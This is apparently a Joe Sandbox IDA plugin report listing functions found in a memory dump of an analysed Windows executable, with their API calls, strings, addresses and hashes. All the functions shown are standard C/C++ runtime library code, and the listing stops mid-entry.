Function 00FDF778 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FDF897
___TypeMatch.LIBVCRUNTIME ref: 00FDF9A5
_UnwindNestedFrames.LIBCMT ref: 00FDFAF7
CallUnexpected.LIBVCRUNTIME ref: 00FDFB12

Strings

csm, xrefs: 00FDF8CE
csm, xrefs: 00FDF822
csm, xrefs: 00FDF7B5

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: e4ba7745a78f2a2eef5067fd6dc64fa14384f0ca9e9bc197632368a147b5e238
Instruction ID: e62ea20da2cf750ca049105dd79dcf949c2d40001dbfee402b5f059a3467121b
Opcode Fuzzy Hash: e4ba7745a78f2a2eef5067fd6dc64fa14384f0ca9e9bc197632368a147b5e238
Instruction Fuzzy Hash: 85B15B72C00219EFCF15DFA4D841DAEB7B6EF14320B18416BE8066B312D739DA59EB91

Function 00FF0AE7 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00FF0D60

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 1c54073322181925d33fd3a51d3893edc79a741a8bd9d2cccae335286bde22eb
Instruction ID: fe89e42bd059a546151b00b43cf4a46712793a930e1f1d07e734be131f4f9ea5
Opcode Fuzzy Hash: 1c54073322181925d33fd3a51d3893edc79a741a8bd9d2cccae335286bde22eb
Instruction Fuzzy Hash: 5CB10271E0024DAFDB11CFA9C880BBEBBB5AF85314F144158E640A72A3CFB59D41EB61

Function 00FDBCA6 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FDBCEF
__alloca_probe_16.LIBCMT ref: 00FDBD1B
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FDBD5A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDBD77
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FDBDB6
__alloca_probe_16.LIBCMT ref: 00FDBDD3
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDBE15
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FDBE38

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 6b6ce7eb63154017a1f057c7b78140f4ccd02a0e342a09121995dc3020089ee1
Instruction ID: fcf0773fa79aa6dc7bcc72065218d09d8339a5d9055e8ea1351ede195b6044bf
Opcode Fuzzy Hash: 6b6ce7eb63154017a1f057c7b78140f4ccd02a0e342a09121995dc3020089ee1
Instruction Fuzzy Hash: 5551617290021AEFDF219F55CC85FAB7BABEF44B50F1A451AFA1497250DB748C10EB50

Function 00FEDF6B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,FF1DE74C,?,00FEE078,00FE07D1,?,?,00000000), ref: 00FEE02C

Strings

ext-ms-, xrefs: 00FEDFD6
api-ms-, xrefs: 00FEDFC2

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 67a57174bcf44d8f955c3712d253bbbd898366493723daf08b9bae62023b4958
Instruction ID: 9a3976ed62f956174163b776cbb34413b6244f898afdadfdd0895e028cdf1fd7
Opcode Fuzzy Hash: 67a57174bcf44d8f955c3712d253bbbd898366493723daf08b9bae62023b4958
Instruction Fuzzy Hash: D1213A72E01295ABD731DB66EC54A6A336CDF417B0F240121FA56A72D0DBB4ED00E6E0

Function 00FDF40A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00FDF401,00FDDB3A,00FDCC2A), ref: 00FDF418
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FDF426
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FDF43F
SetLastError.KERNEL32(00000000,00FDF401,00FDDB3A,00FDCC2A), ref: 00FDF491

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3197b13d45ec8c3dfd8548c5a660c660b14c3c552285563fa2fd4575071fe9f4
Instruction ID: cca27a092304987a628a31af50698cb9fc68f5e4c7aa32a19a42ecc6c56d3d8b
Opcode Fuzzy Hash: 3197b13d45ec8c3dfd8548c5a660c660b14c3c552285563fa2fd4575071fe9f4
Instruction Fuzzy Hash: 81014737A19311AEA7206BB5FC89E3B3649EF42734324023BF455812E5EF964C95B345

Function 00FEAB64 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FF1DE74C,?,?,00000000,00FFD077,000000FF,?,00FEAAF4,?,?,00FEAAC8,?), ref: 00FEAB99
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FEABAB
FreeLibrary.KERNEL32(00000000,?,00000000,00FFD077,000000FF,?,00FEAAF4,?,?,00FEAAC8,?), ref: 00FEABCD

Strings

mscoree.dll, xrefs: 00FEAB92
CorExitProcess, xrefs: 00FEABA3

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 65b18f023df322837a1c07faf1920aff41437f1cd0491b0f11db432841f8c063
Instruction ID: 28b246560e6b10f406fd87274e580f358b858072bf4c646a64726a2a94f30cf9
Opcode Fuzzy Hash: 65b18f023df322837a1c07faf1920aff41437f1cd0491b0f11db432841f8c063
Instruction Fuzzy Hash: 4F01A231950659FFDB118B55DC09FBEBBBDFF44B14F000629E811A66E0DBB89900DB91

Function 00FF30F3 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00FF317A
__alloca_probe_16.LIBCMT ref: 00FF323B
__freea.LIBCMT ref: 00FF32A2

Part of subcall function 00FF126C: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,00FE0862,?,00FE07D1,00000000,?,00FE09E0), ref: 00FF129E

__freea.LIBCMT ref: 00FF32B7
__freea.LIBCMT ref: 00FF32C7

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: ee99d27a2c4bf22a4b1348cc54bd1b55e5c13875288bb9b0e7c6ea9a757ebcea
Instruction ID: a43c46334d285463024c93b6927217f7725e9977074fc8b0f8b90bad94ffa7c5
Opcode Fuzzy Hash: ee99d27a2c4bf22a4b1348cc54bd1b55e5c13875288bb9b0e7c6ea9a757ebcea
Instruction Fuzzy Hash: FB51A972A0020EAFEF259FA4DC41EBB7BA9EF45764B150129FE04D7261E774CE10A760

Function 00FDAA0F Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FDAA16
std::_Lockit::_Lockit.LIBCPMT ref: 00FDAA20

Part of subcall function 00FD3D80: std::_Lockit::_Lockit.LIBCPMT ref: 00FD3D8F
Part of subcall function 00FD3D80: std::_Lockit::~_Lockit.LIBCPMT ref: 00FD3DAA

codecvt.LIBCPMT ref: 00FDAA5A
std::_Facet_Register.LIBCPMT ref: 00FDAA71
std::_Lockit::~_Lockit.LIBCPMT ref: 00FDAA91

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: ad7abe19d305a246ca60e093e8e96c4d2606db12f2468ada504ee4f6a273ba1a
Instruction ID: 403e2b6047ea7b39adbd28a713af89d40c4c427406f4ef29f6aecff43594191c
Opcode Fuzzy Hash: ad7abe19d305a246ca60e093e8e96c4d2606db12f2468ada504ee4f6a273ba1a
Instruction Fuzzy Hash: BE11B471900219DFCB25EF64DD457AEB7B6AF84720F28050BE40197391DBB89E00E796

Function 00FD9EBD Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FD9EC4
std::_Lockit::_Lockit.LIBCPMT ref: 00FD9ECF
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD9F3D

Part of subcall function 00FDA020: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00FDA038

std::locale::_Setgloballocale.LIBCPMT ref: 00FD9EEA
_Yarn.LIBCPMT ref: 00FD9F00

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: c89ace0ce13714e38a1bc3d2f389474511d1f4c4c74517d0a39a685af5de8a9d
Instruction ID: 7d2eb8076bf37755e173566f96495fe756e4bc79cc77b00a3d77ef69a8c617ba
Opcode Fuzzy Hash: c89ace0ce13714e38a1bc3d2f389474511d1f4c4c74517d0a39a685af5de8a9d
Instruction Fuzzy Hash: 1801BC76A042198BCB16EF60D81563DBB66FF85350B18400AE80197395CFBCAE02EBC2

Function 00FE0552 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00FE0503,00000000,00000001,0103F764,?,?,?,00FE06A6,00000004,InitializeCriticalSectionEx,010000C0,InitializeCriticalSectionEx), ref: 00FE055F
GetLastError.KERNEL32(?,00FE0503,00000000,00000001,0103F764,?,?,?,00FE06A6,00000004,InitializeCriticalSectionEx,010000C0,InitializeCriticalSectionEx,00000000,?,00FE045D), ref: 00FE0569
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00FDF373), ref: 00FE0591

Strings

api-ms-, xrefs: 00FE0576

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 9a412c442003b80ca98b09f242a853da6fd441c15c5a2663abc8d6d9406709a0
Instruction ID: bc2d2b2ce9f4cd0683161c7be1c2cf308619c934d799866267b7d7f4cd7ae755
Opcode Fuzzy Hash: 9a412c442003b80ca98b09f242a853da6fd441c15c5a2663abc8d6d9406709a0
Instruction Fuzzy Hash: 70E01A70680348BAFB201B66EC06F683B599F04B60F540020F90CA80B0DFE2A994EA94

Function 00FEEC4F Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(FF1DE74C,00000000,00000000,?), ref: 00FEECB2

Part of subcall function 00FF383F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FF3298,?,00000000,-00000008), ref: 00FF38EB

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FEEF0D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FEEF55
GetLastError.KERNEL32 ref: 00FEEFF8

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82d0dbb3bb4b1761aab4cdf546f3d30e45d88e7aa8c14c61b2c6d06af96c4531
Instruction ID: 0bf5035ddf81abf49dc228d155421e5da551aca90ba4f4a384bfd7d5f81b6c9c
Opcode Fuzzy Hash: 82d0dbb3bb4b1761aab4cdf546f3d30e45d88e7aa8c14c61b2c6d06af96c4531
Instruction Fuzzy Hash: 90D18975D002989FCF11CFA9D880AEDBBB9FF48310F18452AE955EB355D730A905DB50

Function 00FDF521 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FDF5E8
___AdjustPointer.LIBCMT ref: 00FDF60B
___AdjustPointer.LIBCMT ref: 00FDF6A7

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: de499ee13a82480a6a404df2e6b2ace8b07f4331bd409e67b3b0172a2824afc8
Instruction ID: 6edb4f0821f50e4d5fdbba755b3074b3209c739b4482cba87e7f744599fd80e8
Opcode Fuzzy Hash: de499ee13a82480a6a404df2e6b2ace8b07f4331bd409e67b3b0172a2824afc8
Instruction Fuzzy Hash: A851AD72A05202AFDB299F10D841F6A73A6EF04324F1C413BE806977A1D735EC89EB90

Function 00FFB69D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00FF7F98,00000000,00000001,00000000,?,?,00FEF04C,?,00000000,00000000), ref: 00FFB6B4
GetLastError.KERNEL32(?,00FF7F98,00000000,00000001,00000000,?,?,00FEF04C,?,00000000,00000000,?,?,?,00FEF60A,?), ref: 00FFB6C0

Part of subcall function 00FFB686: CloseHandle.KERNEL32(FFFFFFFE,00FFB6D0,?,00FF7F98,00000000,00000001,00000000,?,?,00FEF04C,?,00000000,00000000,?,?), ref: 00FFB696

___initconout.LIBCMT ref: 00FFB6D0

Part of subcall function 00FFB648: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FFB677,00FF7F85,?,?,00FEF04C,?,00000000,00000000,?), ref: 00FFB65B

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00FF7F98,00000000,00000001,00000000,?,?,00FEF04C,?,00000000,00000000,?), ref: 00FFB6E5

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0f0042d65ba9134d196e799eb2895420952635717b24e3a984aac2fe15314a01
Instruction ID: 2cfcb5210832600685773b6543a89e053b5728e4ed0312d8a7a9a3130333b375
Opcode Fuzzy Hash: 0f0042d65ba9134d196e799eb2895420952635717b24e3a984aac2fe15314a01
Instruction Fuzzy Hash: 57F0AC3650111CBBCF221F96DC08AA93F6AFF087A1B054550FB1896130CB768820FFA6

Function 00FDF210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00FDF24F
__IsNonwritableInCurrentImage.LIBCMT ref: 00FDF303

Strings

csm, xrefs: 00FDF2ED

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: a58a05ecb871559811947200322814c20ceeab5cda3c334b8a579a5f973e15c5
Instruction ID: e880a3725c2c03fa0819f3e9c0f554a30e3cbe2e4ff76cb728a444e86f689e59
Opcode Fuzzy Hash: a58a05ecb871559811947200322814c20ceeab5cda3c334b8a579a5f973e15c5
Instruction Fuzzy Hash: 6641E834E102099BCF10DF69CC84E9E7BB6AF44324F1C8076E9169B392D775DA19EB90

Function 00FDFB1D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00FDFB42

Strings

MOC, xrefs: 00FDFB54
RCC, xrefs: 00FDFB5C

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 7dfac169fbd1f52d6efa58362e0e2cbe4ed09ebcff555db0254e8d1eb9af1a47
Instruction ID: e42c8823c430b90aa0df9fa9d73b8824ac361db4b2fc6992c9a806b7c12be6f5
Opcode Fuzzy Hash: 7dfac169fbd1f52d6efa58362e0e2cbe4ed09ebcff555db0254e8d1eb9af1a47
Instruction Fuzzy Hash: B0418A7190020DAFCF15DF98CC81EAE7BB6FF48314F18816AF90666221D3359A65EB50

Function 00FD3450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD3455
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FD349A

Part of subcall function 00FD9FBB: _Yarn.LIBCPMT ref: 00FD9FDA
Part of subcall function 00FD9FBB: _Yarn.LIBCPMT ref: 00FD9FFE

Strings

bad locale name, xrefs: 00FD34A8

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 5c61f8ad44d446a5f9b4676b41dacb5a2db60e018770378de841a86689145a0a
Instruction ID: c004f65a0b7db678c3476ebcfd38c1a9a08115d822d65da6b1c8e4c795a88531
Opcode Fuzzy Hash: 5c61f8ad44d446a5f9b4676b41dacb5a2db60e018770378de841a86689145a0a
Instruction Fuzzy Hash: 95F0F971505B808ED370DF75C804747BAE0AF25314F048A1ED5CAC7B51E3B9E5088BA6

Function 00FD3D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FD3D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 00FD3DAA

Strings

ios_base::badbit set, xrefs: 00FD3D81

Memory Dump Source

Source File: 00000000.00000002.1828482643.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1828468164.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
